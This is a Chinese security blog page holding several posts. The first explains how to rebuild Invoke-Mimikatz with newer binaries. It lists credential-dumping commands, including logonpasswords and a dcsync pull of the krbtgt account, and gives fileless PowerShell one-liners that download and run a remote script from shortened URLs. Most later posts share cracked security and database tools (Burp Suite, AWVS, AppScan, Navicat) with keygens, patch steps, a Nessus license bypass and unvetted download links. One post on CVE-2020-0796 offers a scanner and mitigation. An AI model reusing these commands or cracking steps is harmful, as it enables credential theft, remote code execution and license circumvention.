更新 Invoke-Mimikatz.ps1 中的 Mimikatz 版本为最新 2.2.0 20200519 版本 技术文章

shotpic_2020-06-24_12-26-38.png



invoke-mimikatz是什么?invoke-mimikatz是powersploit渗透测试套装中的一个powershell版本的mimikatz工具,用来抓取windows操作系统中的密码。

但是其内置的mimikatz版本过低,导致在实际使用中会多多少少的有一些问题。



通过查看 https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 脚本内容知道 $PEBytes64 和 $PEBytes32 变量,应该是把 Mimikatz 的两个版本的EXE文件进行base64编码.

那就只替换最新的试试,使用 python3 替换完成更新代码 update.py 如下: 

import fileinput
import base64

with open("./Win32/mimikatz.exe", "rb") as f:
    win32 = base64.b64encode(f.read()).decode()

with open("./x64/mimikatz.exe", "rb") as f:
    x64 = base64.b64encode(f.read()).decode()

for line in fileinput.FileInput("./Invoke-Mimikatz.ps1", inplace=1):

  line = line.rstrip('\r\n')
  if "$PEBytes64 = " in line:
    print("$PEBytes64 = '" + x64 + "'")
  elif "$PEBytes32 = " in line:
    print("$PEBytes32 = '" + win32 + "'")
  else:
    print(line)

将 update.py 脚本和 Invoke-Mimikatz.ps1 放在 mimikatz_trunk 解压后的同目录。执行即可更新完毕。

更新后的效果如首图所示,从 Mimikatz 2.1 2016年的版本更新到最新的 2.2.0 20200519 Windows 10 2004 (build 19041) 版本。

顺带提一下:Mimikatz 使用时需要高权限,至少是 administrator 权限 Mimikatz 抓取密码的命令需要 system 权限,可以先进行提权,

基本使用:

privilege::debug  //提升权限(从administrator提升到system)如果是system权限执行,可省略



抓取hash:

sekurlsa::logonpasswords   //获取当前在线用户的明文密码(需要高权限运行)

lsadump::lsa /patch   //获取当前此计算机存在过用户的NTLMHASH



mimikatz 的其他命令:

lsadump::sam SYSTEM.hiv //导出所有用户口令 使用Volue Shadow Copy获得SYSTEM、SAM备份

通过内存文件获取口令

sekurlsa::minidump lsass.dmp

sekurlsa::logonPasswords full

拉取 rd.adsecurity.org 域中的 KRBTGT 用户帐户的密码数据

lsadump::dcsync /domain:rd.adsecurity.org /user:krbtgt

拉取 lab.adsecurity.org 域中 ADSDC03 域控制器的计算机帐户的密码数据

lsadump::dcsync /domain:lab.adsecurity.org /user:adsdc03$



msf使用 mimikatz:

在meterpreter中加载mimikatz模块

load mimikatz



然后help,查看参数信息:

kerberos          Attempt to retrieve kerberos creds

livessp           Attempt to retrieve livessp creds

mimikatz_command  Run a custom command

msv               Attempt to retrieve msv creds (hashes)

ssp               Attempt to retrieve ssp creds

tspkg             Attempt to retrieve tspkg creds

wdigest           Attempt to retrieve wdigest creds



常用命令为kerberos和msv。



无文件落地执行 mimikatz 

在Windows server 2008 及之前 可以使用如下命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/SdU3mjdm'); Invoke-Mimikatz -DumpCreds" 

在Windows server 2009 及之后,可以使用如下命令:

powershell "IEX (New-Object Net.WebClient).DownloadString('https://url.cn/wv7uNQrc'); Invoke-Mimikatz"

然后抓取hash即可抓取 NTLM。

注意,目前上面这个新版的脚本来自我的 GitHub 仓库: https://github.com/Mr-xn/Penetration_Testing_POC/blob/master/tools/Invoke-Mimikatz.ps1

各位大佬点个star啊!里面收藏了我所看到过的觉得有价值的渗透测试工具,POC,Android渗透测试、脱壳相关的文章。

目前会有 BUG ,细心的可以看到图上的第二个命令行窗口。欢迎能修复BUG的大佬可以 Pull !



参考:鸿鹄实验室公众号文章-渗透tips---->更新你的invoke-mimikatz


Mrxn 发布于 2020-6-24 12:27

Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen下载---update_to_burpsuite_pro_v2020.11.3.jar 安全工具

先上图:
burpsuite_pro_v2020.9.2.png
Burp Suite Professional Edition v2020.5 x64 & Burp_Suite_Pro_v2020.5_Loader_Keygen下载,官方更新日志:

You can now choose to display non-printing characters as "lozenges" in the HTTP message editor. This is supported for any bytes with a hexadecimal value lower than 20, which includes tabs, line feeds, carriage returns, and null bytes.

This feature will be greatly beneficial for many use cases, including:

Spotting subtle differences between byte values in responses

Experimenting with HTTP request smuggling vulnerabilities

Studying line endings to identify potential HTTP header injection vulnerabilities

Observing how null-byte injections are handled by the server

Non-printing characters are hidden by default, but you can toggle the lozenges on and off by clicking the "\n" button at the bottom of the editor.

These non-printing characters can currently only be displayed in the message editor. For now, you have to edit bytes using Burp's hex view. However, we plan to enable you to do this directly in the message editor in the near future.

修复一些bug:

We have also implemented several minor bug fixes, most notably:
The response received/completed times are now displayed for 401 responses.
The response time is now displayed even when the time taken was < 1ms.
"Check session is valid" session handling rules are now applied properly when session tracing is running
The content discovery tool no longer erroneously displays the "Session is not running" message.
This release also provides the following minor improvements to various areas of Burp: The embedded Chromium browser for the experimental browser-driven scanning mode has been upgraded to version 83. Java 14 is now supported for both Professional and Community Edition. Burp Proxy no longer intercepts requests for SVG or font files by default. Crawling of static content is now faster.

下载地址:

---------------------------------------------------------------------

2020/12/02 update burpsuite_pro_v2020.11.3.jar

https://cloud.189.cn/t/JbqUJ3QrEfqa(访问码:5sri)

没有意外不会在分享了,burp官网可以公开下载了。

---------------------------------------------------------------------

2020/11/28 update burpsuite_pro_v2020.11.2.jar

https://cloud.189.cn/t/eM3yUrJniiIv(访问码:30ta)

---------------------------------------------------------------------

2020/11/20 update burpsuite_pro_v2020.11.1.jar:

https://cloud.189.cn/t/ieYRBzjUBzUb(访问码:waq8)

https://mega.nz/folder/aU8QBCIC#1vu1C1zXFFUZonO-uCLLlg

---------------------------------------------------------------------

2020/11/10更新burpsuite_pro_v2020.11.jar下载:

链接:https://cloud.189.cn/t/MvInAb6vQRZr  访问码:b8ul

$ shasum -a 256 burpsuite_pro_v2020.11.jar&&md5 burpsuite_pro_v2020.11.jar

8ea15e1a0a5b742744afb7e1ab25759081e468eee6a853d7a8546ec3b5c6096c burpsuite_pro_v2020.11.jar

MD5 (burpsuite_pro_v2020.11.jar) = 9d0dea6acc6b8570fd9c9c32eb981474


---------------------------------------------------------------------

2020/10/20更新burpsuite_pro_v2020.9.2.jar下载:
链接:https://cloud.189.cn/t/RneiMvraeiIr(访问码:q1es)
https://mega.nz/folder/yRkGHBwQ#r5a8fxZSEJ_HGnxZ7eZ39Q

---------------------------------------------------------------------

2020/09/05更新burpsuite_pro_v2020.9.1.jar下载:

https://cloud.189.cn/t/BVnyUvEVbiUb(访问码:lpy8

https://mega.nz/folder/bNkgzYIC#qK7ET0ddW9wYjrWT8pke1Q


Downloads shasum -a 256 burpsuite_pro_v2020.9.1.jar

ad79a1a7c3ab7a7714608ff7bb88a29d2b490a3e4b02ede2a61da6d3213dd08b burpsuite_pro_v2020.9.1.jar

Downloads md5 burpsuite_pro_v2020.9.1.jar

MD5 (burpsuite_pro_v2020.9.1.jar) = bfd49439d8aeace81a704e82b43dca74

---------------------------------------------------------------------
2020/09/04更新burpsuite_pro_v2020.9.jar下载:

https://cloud.189.cn/t/e2MniiUfMRje(访问码:wkw8)https://mega.nz/folder/XA1HQbpI#x9oKlzY_n4_gVWg6BuE8PQ


Downloads shasum -a 256 burpsuite_pro_v2020.9.jar

8175e78a42f2959a05830cbf7f082f50edec2ad3dcc58d8609980063a1c91686 burpsuite_pro_v2020.9.jar

Downloads md5 burpsuite_pro_v2020.9.jar

MD5 (burpsuite_pro_v2020.9.jar) = bccee79151a2648d33e29da081703c9c

---------------------------------------------------------------------

2020/08/22更新burpsuite_pro_v2020.8.1.jar&burpsuite_pro_linux_v2020_8_1.sh下载:

https://cloud.189.cn/t/uq6Bveyu6Vfy(访问码:e3te

https://mega.nz/folder/LAthQZxQ#24CefPgmwT3j9n8EpsYLtw

jar_burp_8.1_hash.png
linux_burp_8.1_hash.png

---------------------------------------------------------------------

2020/08/07更新burpsuite_prov2020.8.jar下载:

https://cloud.189.cn/t/JrUFNj3yYriu (访问码:6f4r)

https://mega.nz/folder/rZ1RkIzK#G2iwuZgxi1uyrSLI
-upyg
---------------------------------------------------------------------
2020/07/18更新burpsuite_pro_v2020.7.jar下载:

https://cloud.189.cn/t/INvu6fyIFvEb(访问码:ox2w

https://mega.nz/folder/eY1nEQAD#4uuJzQkl8gHRpggLbzUi0Q
---------------------------------------------------------------------

2020/07/05更新burpsuite_pro_v2020.6.jar下载:

https://cloud.189.cn/t/6vy6NnbY7FNv(访问码:2cua

https://mega.nz/file/TFEmhIpY#wvBqsNVkFMs0zMz6yec8GHNoMKAVLkl-JnVIG4gNDLg

---------------------------------------------------------------------

2020/06/21更新burpsuite_pro_v2020.5.1.jar下载:

https://cloud.189.cn/t/YFjIbmu6BzQb(访问码:xp6t

https://mega.nz/folder/SFNyXI5L#bTSK9CEQ9u6dl-tR03jOJg

burpsuite_pro_v2020.5.1_noJDK.7z下载:

https://cloud.189.cn/t/EB7VRfmIv2Y3(访问码:toq7

---------------------------------------------------------------------

单独的
burpsuite_pro_v2020.5.jar下载:
https://cloud.189.cn/t/eEB3a2FN3e2m(访问码:b678
https://mega.nz/file/SQ82RYzS#DsWfmm1i6pjr_Ob6gpfwyigdPUJauM2pCHQwfbzOZvs
单独的激活包kegen loader没有JDK,下载:
https://cloud.189.cn/t/ai2yeuE3qiua(访问码:q9t8
https://mega.nz/file/vMkEgYRZ#S-35eQEJuxcRxhl3P0o7Jg4-ASHQyT0pAP73AYObrcc

jdk-11.0.7.7z 下载:
https://cloud.189.cn/t/Mb6n6fbiAfAv

https://www89.zippyshare.com/v/t3ulVWpo/file.html
https://mega.nz/file/vMNBUQhD#Q8A6gAhak4hX8eD2hc6_Jg_TgCmXcYs4M8aCmZFQlhE
总包下载:
不重复上传了,直接下载上面的单独的JDK+单独的激活包kegen loader没有JDK解压到一起就可以直接使用了。
文件目录结构参考这里:

如果之前有使用过破解版的,就不需要再次激活了。直接创建桌面快捷方式就OK。详情可以看前一篇burp2020.4.1的激活下载那篇文章:https://mrxn.net/hacktools/663.html
如有遗漏,还请见谅.
有能力就支持正版吧。
同样的,资源来自于互联网,我只是做了整合,适合自己使用的习惯罢了。


Mrxn 发布于 2020-6-7 15:27

AWVS 13.0.200519155 Windows原版包+Acunetix_13.0.200401171 Windows+Linux原版包 安全工具

关于AWSAcunetix Web Vulnerability Scanner)可以查看博客之前的其他相关文章:https://mrxn.net/index.php?keyword=Acunetix 这里不做重复介绍,直接说重点:

原版未破解文件,请自行和官网核对MD5。需要破解的同上的介绍,安装旧的版本破解。

文件包列表如下:

acunetix_13.0.200401171_x64.sh

acunetix_13.0.200401171.exe

acunetix_13.0.200519155.exe

其中13.0.200519155版本的Linux版本暂时没有,即acunetix_13.0.200519155_x64.sh暂没有,有的时候添加。

下载地址:

https://mega.nz/folder/7Bl1CY5J#352H2LduPgfRBA5Ga1ootw&nbsp;

国内下载分享:链接: http://pan-yz.chaoxing.com/share/info/18e8a7646064d15e密码 : 4h7fuq 

另外acunetix_13.0.200409107.exe以及acunetix_13.0.200409107.exe的Windows版本破解文件都在上面的网盘里面,解压密码:mrxn.net

---------------------------------------------------------------------

update:2020/06/30 :

acunetix_13.0.200625101.exe

acunetix_13.0.200625101_x64.sh

AWVS_13.0.200625101破解补丁[Windows].zip 下载:

acunetix_13.0.200625101_Win&Linux破解版.rar

---------------------------------------------------------------------

acunetix_13.0.200715107.exe下载:

https://cloud.189.cn/t/RNVRfeQJviMj(访问码:cf2o

patch4awvs13.0.200715107.rar:

链接:https://cloud.189.cn/t/a2QRn2FBFJNj访问码:9hs9

国外地址还是上面的地址:

https://mega.nz/folder/7Bl1CY5J#352H2LduPgfRBA5Ga1ootw&nbsp;

国内下载地址:

https://cloud.189.cn/t/NjeUbqbEruQn(访问码:eec8

破解步骤:

1、下载本补丁包以后,关闭AWVS,将wvsc.exe放在AWVS安装目录下,与原文件进行替换;

2、将license_info.json放在C:\ProgramData\Acunetix\shared\license目录下,与原文件进行替换;

3、以管理员身份运行命令行窗口并输入cacls "C:\ProgramData\Acunetix\shared\license." /t /p everyone:r即可。




Mrxn 发布于 2020-5-27 19:13

Burp Suite Professional Edition v2020.4.1 x64 & Burp_Suite_Pro_v2020.4.1_Loader_Keygen下载 安全工具

Burp Suite Professional Edition v2020.4.1 x64 & Burp_Suite_Pro_v2020.4.1_Loader_Keygen下载

话不多说,直接上Burp_Suite_Pro_v2020.4.1_Loader_Keygen下载:

https://github.com/x-Ai/BurpSuiteLoader/releases/download/v1.1/BurpSuiteLoader.jar&nbsp;

使用方法和之前的 burpsuite_pro_v2020.4.jar&burp-loader-keygen-2020_4.jar download 一样的使用方式。

更多burp的使用请看这里https://mrxn.net/tag/burpsuite 

下面是我自己使用的包:包含独立的jdk11(windows环境)不需要单独的Java环境即可运行。如果是Linux请自行安装Java环境,使用Loader.jar来启动激活。



burpsuite_pro_v2020.4.1激活和创建桌面快捷方式资源:

https://www89.zippyshare.com/v/uAzgb0QM/file.html&nbsp;

https://mega.nz/file/LElhkbTQ#T__HLgaHXCwuQj8FPh49vWazGAtDxW2Q7CrPbtotZEA



jdk-11.0.7.7z 下载:

https://cloud.189.cn/t/Mb6n6fbiAfAv


https://www89.zippyshare.com/v/t3ulVWpo/file.html

https://mega.nz/file/vMNBUQhD#Q8A6gAhak4hX8eD2hc6_Jg_TgCmXcYs4M8aCmZFQlhE



burpsuite_pro_v2020.4.1.jar 下载:

https://www89.zippyshare.com/v/vtwIvMFu/file.html

https://mega.nz/file/PJ0H3JIL#H7Lc0spRbNd3k8W6MQz0dBivQGKlO2MM3UuNbfK5kZ4



你可以分开下载,也可以下载下面这个总包(解压密码:mrxn.net):

https://mega.nz/file/SVUFSQgQ#osze1oItI_MBXNSIFoF3psYpHR3Rl6OCPfdo2Jc0jRc&nbsp;

大致说下Windows下的首次激活使用,激活过一次后面就不需要在激活直接替换burp pro 和 burp-loader-keygen 即可直接使用:

1.直接打开1.先激活.vbs:到激活界面 点击RUN 然后复制 License,等待burp启动:

1.png

2.burp启动后,将刚刚复制的License 粘贴到burp的license里面 然后点击下一步:

2.png

3.选择手动激活:

3.png 

4.复制 burp界面的 request内容粘贴到 激活工具的 request里面: 

4.png 

5.粘贴了request后,激活工具会自动生成response,复制response粘贴到burp的response里面:

5.png 

6.finish激活成功,结束:

6.png 

7.创建桌面快捷方式,英文原版或者汉化版:

7.png 

8.双击桌面快捷方式即可打开激活后burp使用了,有关burpsuite的插件可以看看这里:

https://github.com/Mr-xn/BurpSuite-collections&nbsp;

8.png 

回见,朋友们。

注:Loader.jar源处:https://www.dr-farfar.com/burp-suite-professional-full/


Mrxn 发布于 2020-5-21 17:26

Web漏扫软件 AppScan 10.0.0 破解版本下载 安全工具

0x01 软件介绍

AppScan是IBM公司出的一款Web应用安全测试工具,采用黑盒测试的方式,可以扫描常见的web应用安全漏洞。其工作原理,首先是根据起始页爬取站下所有可见的页面,同时测试常见的管理后台;获得所有页面之后利用SQL注入原理进行测试是否存在注入点以及跨站脚本攻击的可能;同时还会对cookie管理、会话周期等常见的web安全漏洞进行检测。

AppScan功能十分齐全,支持登录功能并且拥有十分强大的报表。在扫描结果中,不仅能够看到扫描的漏洞,还提供了详尽的漏洞原理、修改建议、手动验证等功能。

0x02 安装 

1.用rcl_rational.dll替换安装目录下的对应文件

2.在许可证管理中导入AppScanStandard.txt作为许可证

GIF动态使用:



2020/06/10更新下破解的步骤:

正常安装完成后把rcl_rational.dll和AppScanStandard.txt复制替换到安装目录,默认安装目录是:C:\Program Files (x86)\HCL\AppScan Standard ,然后在许可证哪里切换到IBM许可证,打开license管理,选择本地的AppScanStandard.txt即可。大致步骤贴图如下:

切换到IBM许可证.png 

许可证配置.png 

配置成功.png 

测试成功机器环境如下:

OS : Windows10 2004 x64 (物理机,非虚拟机,虚拟机可能会出现在安装完后打开出现"无法载入许可证")

下载:


https://cloud.189.cn/t/EBNVziZJj2Aj

https://pan.baidu.com/s/1ZixX84P10rt1T2WNkpx0Fg 提取码: ag7u


https://anonfile.com/p177G5w5oa/AppScan10.0.0_7z

https://mega.nz/file/bZdDVSoS#K0xDXmExFO73Kp2wzexuLDNHSwlWOlJPqJFdmdIge-o

-------------------------------------------------------------------------------------------------------------------------------------------------------------------------

update:2020/07/05:更新AppScan_Setup_10.0.1.exe 下载:

https://cloud.189.cn/t/YNNNjqemuYBz(访问码:7iyo

https://mega.nz/file/qFk0nKYY#0SKI_kNEd4TtHy4HzdhnBIl5YAKCDacWzoQ8tEQ1tBY


Mrxn 发布于 2020-5-7 17:01

burpsuite_pro_v2020.4.jar&burp-loader-keygen-2020_4.jar download 安全工具

四哥已经不再做这个老中医了,有了新的老中医,公众号姑娘别来无恙提供。再次表示感谢。

burpsuite_pro_v2020.4 需要Java9至Java13之间的版本

我提供的压缩包里面包含了Java11的jdk。快捷方式也写好了,只需要激活就可以直接使用,也不需要单独另外安装配置Java11,当然,你也可以自己安装配置你自己的环境变量,那你同时也需要修改快捷启动方式里面的java.exe 的路径。

没有激活的,在你原有的Java8环境下,直接打开 burp-loader-keygen-2020_2.jar,按照提示激活即可。

不会激活的看下面的相关教程激活:

https://mrxn.net/hacktools/Burp_Suite_Pro_v1_7_3_2_Loader_Keygen_Cracked_Share.html 



激活后的中英文版本截图如下:

burpsuite_pro_v2020.4.png

burpsuite_pro_v2020.4_cn.png 

另外也单独提供了一个Java11的jdk压缩包,从官网下载的:

https://www.oracle.com/java/technologies/javase-jdk11-downloads.html

https://vshare.is/tfg3l8v0ob/jdk-11.0.7_windows-x64_bin_zip



burpsuite_pro_v2020.4.jarburp-loader-keygen-2020_4.jar 下载链接如下几个:

https://vshare.is/58l6l2v4o6/burpsuite_pro_v2020.4_7z

https://mega.nz/file/bUFS0Q5L#RvGZaKbdn65rK5BXxxM6APmRqbMbKeHraxIOgou7N5k

解压密码:mrxn.net

以上均在Windows下测试,Linux或者macos请自行解决Java版本要求。


Mrxn 发布于 2020-5-2 13:31

navicat15.0.13 premium激活【Windows版本】 破解软件

navicat15.0.13 premium激活的超详细激活教程,因为在工作中与数据库打交道很多,故navicat也是高频率使用,最近更新了15.0.13 ,而大佬DeFconX也早就在上个月就发更新了Navicat Keygen Patch v5.6.0 DFoX.exe ,支持navicat 15.0.13的注册激活,不需要断网操作。

下载安装过程就不写了,直接默认下一步就OK。下面说一下激活软件的使用,免得有的朋友看不懂咋操作,其实很简单,几个英语单词认识就会。

第一步

打开补丁软件后直接按照步骤选择第一步的path即可



1.png 

第二、三、默认就行

第四步,点击 Generate 生成激活码:



2.png 

patch后在左边生成的serial keygen 复制,也可以直接点击 Generate旁边的Copy复制。

然后打开 Navicat Premium 15,选择试用:



3.png 

 在顶部的菜单栏找到帮助-注册,粘贴第四步的注册码:



4.png
 



 5.png  


选择手动激活:

 

6.png 

复制请求码:



7.png
 


粘贴到激活工具的 第四步下面的 request code



 8.png    

再点击 activation code 下面的 generate 生成最终激活码:



9.png
 

Navicat 的激活码会自动填充,没有的话 手动复制过去填一下就行,最后点击激活就OK。



10.png



最终激活最新版,测试为Windows环境。激活工具也只有Windows的。

11.png12.png 

Navicat 15.0.13激活软件Navicat Keygen Patch v5.6.0 DFoX.exe 下载链接:

https://mrxn.lanzous.com/b01h9vkmb&nbsp;密码:mrxn

标签: 分享 navicat

Mrxn 发布于 2020-4-19 12:20

Nessus v8.9.1 系列Windows10上安装激活无IP限制版本 安全工具

0x0:前言

有关Nessus的简介不多说,做过企业渗透测试的特别是内网的渗透测试就会知道在拿到甲方授权的网络拓扑结构资产列表就可以全部放经来一波。往往会有意想不到的收获,主要是节省大量时间。

注:本次测试系统为Windows10 X64版本

0x1:安装Nessus

直接到 Nessus 官网:https://www.tenable.com/downloads/nessus 下载对应系统版本的 Nessus,基本上主流平台都有。下载好后打开进行安装即可。

Nessus会自动打开浏览器,询问是否使用SSL,选择是,如果浏览器提示证书问题,请忽略或添加白名单,一般默认地址是:https://localhost:8834/,到这里初始化后就开始选择安装了,需要注意第一步选择 Managed Scanner 这项,

step1.png

然后在 Manageed by 下拉选择 Tenable.sc ,

step2.png

然后Continue 即可下一步,

step3.png

创建账号密码。完成后就可以进行下一步。

0x2:获取离线安装包和激活码

打开网址:https://zh-cn.tenable.com/products/nessus/activation-code?tns_redirect=true#nessus

注册一个免费版即 Nessus Essentials ,填写姓名、邮件,然后会收到一封邮件,包含激活码,记住这个激活码,后面下载插件包需要用到。

activecode.png

以管理员权限打开CMD。切换到 Nessus 安装目录,cd D:\Nessus\,执行如下命令获取 Challenge code:

D:\Nessus>nessuscli.exe fetch --challenge



Challenge code: 3xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxf



You can copy the challenge code above and paste it alongside your

Activation Code at:

https://plugins.nessus.org/v2/offline.php



challenge code.png

然后访问 https://plugins.nessus.org/offline.php 填写 Challenge code 和 上面邮件收到的 activation code 来下载获取 all-2.0.tar.gz 和 nessus-fetch.rc 文件



get plugin.png

download plugin.png

downloading plugin.png

最好全程挂代理,速度就很快,不然会很慢。

0x3:离线更新插件

还是在 Nessus 的安装目录使用CMD进行更新:

D:\Nessus>nessuscli.exe update D:\all-2.0.tar.gz

update plugin.png

更新成功后,需要复制 nessus-fetch.rc 到对应文件夹,但是我这里测试并没这个目录,可能是新版本取消了或者Windows取消了,但是 Linux 或 MacOS 貌似 需要这么操作,可以自己搜索一下这个文件是否存在或者是路径是否存在。附上插件下载页面的说明:

You also need to copy the following file to :

/opt/nessus/etc/nessus/nessus-fetch.rc (Unix)

C:\Documents and Settings\All Users\Application Data\Tenable\Nessus\conf\nessus-fetch.rc (Windows XP/2K3)

C:\ProgramData\Tenable\Nessus\conf\nessus-fetch.rc (Windows Vista/7/8/2008/2012)

/Library/Nessus/run/etc/nessus/nessus-fetch.rc (Mac OS X)

/usr/local/nessus/etc/nessus/nessus-fetch.rc (FreeBSD)

0x4:覆盖替换 plugin_feed_info.inc 文件

一开始我的安装完啥都没有,根本没有这个文件。自己在官网这里:https://community.tenable.com/s/article/Tenable-sc-Plugins-Out-of-Sync-warning-explained-Formerly-SecurityCenter

看到了文件内容,就自己手动构造了一个,plugin_feed_info.inc内容大致如下:

PLUGIN_SET = "202003210000";

PLUGIN_FEED = "ProfessionalFeed (Direct)";



PLUGIN_FEED_TRANSPORT = "Tenable Network Security Lightning";



其中 PLUGIN_SET  为你登录 Nessus后的plugin set 值,就是插件版本号,根据你自己的插件版本来,比如 201911212121 或者 202003210000。

将这两个文件复制/替换到如下两个文件夹:

D:\Nessus\nessus\plugin_feed_info.inc

D:\Nessus\nessus\plugins\plugin_feed_info.inc

注意:需要管理员权限覆盖,请自己注意你的安装路径。

最后:重启Nessus 服务,可以再服务里面右键直接重启 Tenable Nessus  服务,也可以自己在刚刚的CMD里面执行(需要管理员权限) :

net stop "Tenable Nessus" && net start "Tenable Nessus"  也可以重启 Nessus 服务。

restart nessus service.png

初始化.png

unlimited version.png

如果是Linux或者是MacOS请注意文件复制后的权限和所有者,需要改成和其他文件一样的用户、组和权限。

重启 Nessus 服务后登录即可看到是 Unlimited 权限,就不再有限制16个IP的扫描了。

但是插件包 免费版和拥有专业版的是不一样的?有没有大佬知道。




更新插件包相关问题请看这里:https://mrxn.net/jswz/673.html


Mrxn 发布于 2020-3-21 19:11

CVE-2020-0796:疑似微软SMBv3协议“蠕虫级”漏洞的检测与修复 网络安全

0x1:背景

2020年3月11日,海外厂家发布安全规则通告,通告中描述了一处微软SMBv3协议的内存破坏漏洞,编号CVE-2020-0796,并表示该漏洞无需授权验证即可被远程利用,可能形成蠕虫级漏洞

0x2:受影响版本

Windows 10版本1903(用于32位系统)

Windows 10版本1903(用于基于ARM64的系统)

Windows 10版本1903(用于基于x64的系统)

Windows 10版本1909(用于32位系统)

Windows 10版本1909(用于基于ARM64的系统)

Windows 10版本1909(用于)基于x64的系统

Windows Server 1903版(服务器核心安装)

Windows Server 1909版(服务器核心安装)

0x3:漏洞检测复现


CVE-2020–0796-Scanner.png

如上图所示,在未停用 SMBv3 中的压缩功能时,我的测试机器win10 1909 18363.719是存在漏洞的,在powershell停用 SMBv3 中的压缩功能后,再次检测就不存在了,暂时只有这个缓解措施,还没有补丁。

0x4:漏洞检测工具

python版本

来源:https://github.com/ollypwn/SMBGhost/blob/master/scanner.py  

import socket
import struct
import sys

pkt = b'\x00\x00\x00\xc0\[email protected]\x00\x00\x00\x00\x00\x00\x00\x00\x00\x1f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00$\x00\x08\x00\x01\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x02\x00\x00\x00\x02\x02\x10\x02"\x02$\x02\x00\x03\x02\x03\x10\x03\x11\x03\x00\x00\x00\x00\x01\x00&\x00\x00\x00\x00\x00\x01\x00 \x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\n\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00'
sock = socket.socket(socket.AF_INET)
sock.settimeout(3)
sock.connect(( sys.argv[1],  445 ))
sock.send(pkt)

nb, = struct.unpack(">I", sock.recv(4))
res = sock.recv(nb)

if not res[68:70] == b"\x11\x03":
    exit("Not vulnerable.")
if not res[70:72] == b"\x02\x00":
    exit("Not vulnerable.")

exit("Vulnerable.")





nmap版本:

#!/bin/bash
if [ $# -eq 0 ]
  then
    echo $'Usage:\n\tcheck-smb-v3.11.sh TARGET_IP_or_CIDR {Target Specification - Nmap}'
    exit 1
fi

echo "Checking if there's SMB v3.11 in" $1 "..."

nmap -p445 --script smb-protocols -Pn -n $1 | grep -P '\d+\.\d+\.\d+\.\d+|^\|.\s+3.11' | tr '\n' ' ' | tr 'Nmap scan report for' '@' | tr "@" "\n" | tr '|' ' ' | tr '_' ' ' | grep -oP '\d+\.\d+\.\d+\.\d+'

if [[ $? != 0 ]]; then
    echo "There's no SMB v3.11"
fi


0x5:漏洞缓解措施

powershell 中运行如下命令:

# 停用
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 1 -Force
# 恢复
Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" DisableCompression -Type DWORD -Value 0 -Force

0x6:漏洞修复

微软昨日发布了更新补丁,下载地址:

https://www.catalog.update.microsoft.com/Search.aspx?q=KB4551762

也可以自行在Windows的更新管理界面手动更新,也可以更新下载补丁.


Mrxn 发布于 2020-3-12 11:18

BurpSuite_pro_v2020.2汉化+破解版下载 安全工具

今天下午一点多四哥(青衣十三)就放出了最新版的burp suite pro v2020.2版本的下载,再次先谢谢四哥造福我们这些买不起正版的同学,鞠躬!

burp suite pro v2020.2最新版的汉化和英文原版的截图如下:

burpsuite pro v2020.2英文版.png

burpsuite pro v2020.2汉化.png

以上两张图都是最新版burpsuite的破解版.包括创建桌面快捷方式的批处理都写好了,打包了,下载地址在最后。

汉化,破解都是在你的Java环境OK的前提下。

创建快捷方式也需要你先破解,burp破解教程可以看这里:https://mrxn.net/hacktools/Burp_Suite_Pro_v1_7_3_2_Loader_Keygen_Cracked_Share.html 

其他burpsuite相关更多的教程、文章以及插件可以在我的GitHub看到: 

https://github.com/Mr-xn/BurpSuite-collections&nbsp;

欢迎star,follow me!

下载连接:https://www50.zippyshare.com/v/JRs9o9EX/file.html&nbsp;

更多可以看四哥公众号,青衣十三楼。


Mrxn 发布于 2020-3-5 21:25

Acunetix Web Vulnerability Scanner v13 Windows版本(acunetix_13.0.200205121.exe)破解版下载 安全工具

昨天发了Linux版的下载:

Acunetix Web Vulnerability Scanner v13 Linux破解版下载 

今天把Windows版本的也发一下,acunetix_13.0.200205121.exe
文件列表:
acunetix_13.0.200205121.exe
acuntix13 windows.txt
AWVS-13.7z
Mrxn's Blog.url
patch.dat
patch.exe

破解使用步骤和之前的12的差不多:

1、下载7z压缩包,解压出来,运行acunetix_13.0.200205121.exe进行安装主程序

2、将patch.exe和patch.dat复制到AWVS安装目录。

3、以管理员身份运行patch.exe文件,根据提示填写相关信息,完成破解。

下载地址:
https://www31.zippyshare.com/v/V9Cdictw/file.html

注意:文件来源于网上,所有的黑客工具推荐在虚拟机使用.对于特别注意安全的,请使用正版软件。

Mrxn 发布于 2020-2-29 14:37

Acunetix Web Vulnerability Scanner v13 Linux破解版下载 安全工具

Acunetix Web Vulnerability Scanner(简称 AWVS )是一款知名的网络漏洞扫描工具,它通过网络爬虫测试网点安全。它具有漏洞扫描、安全检查、安全评估、报告输出等功能,新版本还有web界面,一般是在https://ip:3443/ 端口.

本次带来的是最新发布的v13版本的Linux破解版,Windows暂时没有破解。

之前的acunetix相关破解版本文章:

Acunetix Web Vulnerability Scanner v12.0 破解版Windows+Linux docker 版本 

渗透扫描器-Acunetix.Web.Vulnerability.Scanner.v9.5-破解版

相关更新消息请前往官网查看,https://www.acunetix.com/blog/news/acunetix-v13-release/

安装所需要条件系统如下:

在如下Linux系统测试过: 

- Microsoft Windows 7 or Windows 2008 R2 and later

- Ubuntu Desktop/Server 16.0.4 LTS or higher

- Suse Linux Enterprise Server 15

- openSUSE Leap 15.0 and 15.1

- Kali Linux versions 2019.1 and 2020.1

- CentOS 8 Server and Workstation (with SELinux disabled)

- RedHat 8 (with SELinux disabled)

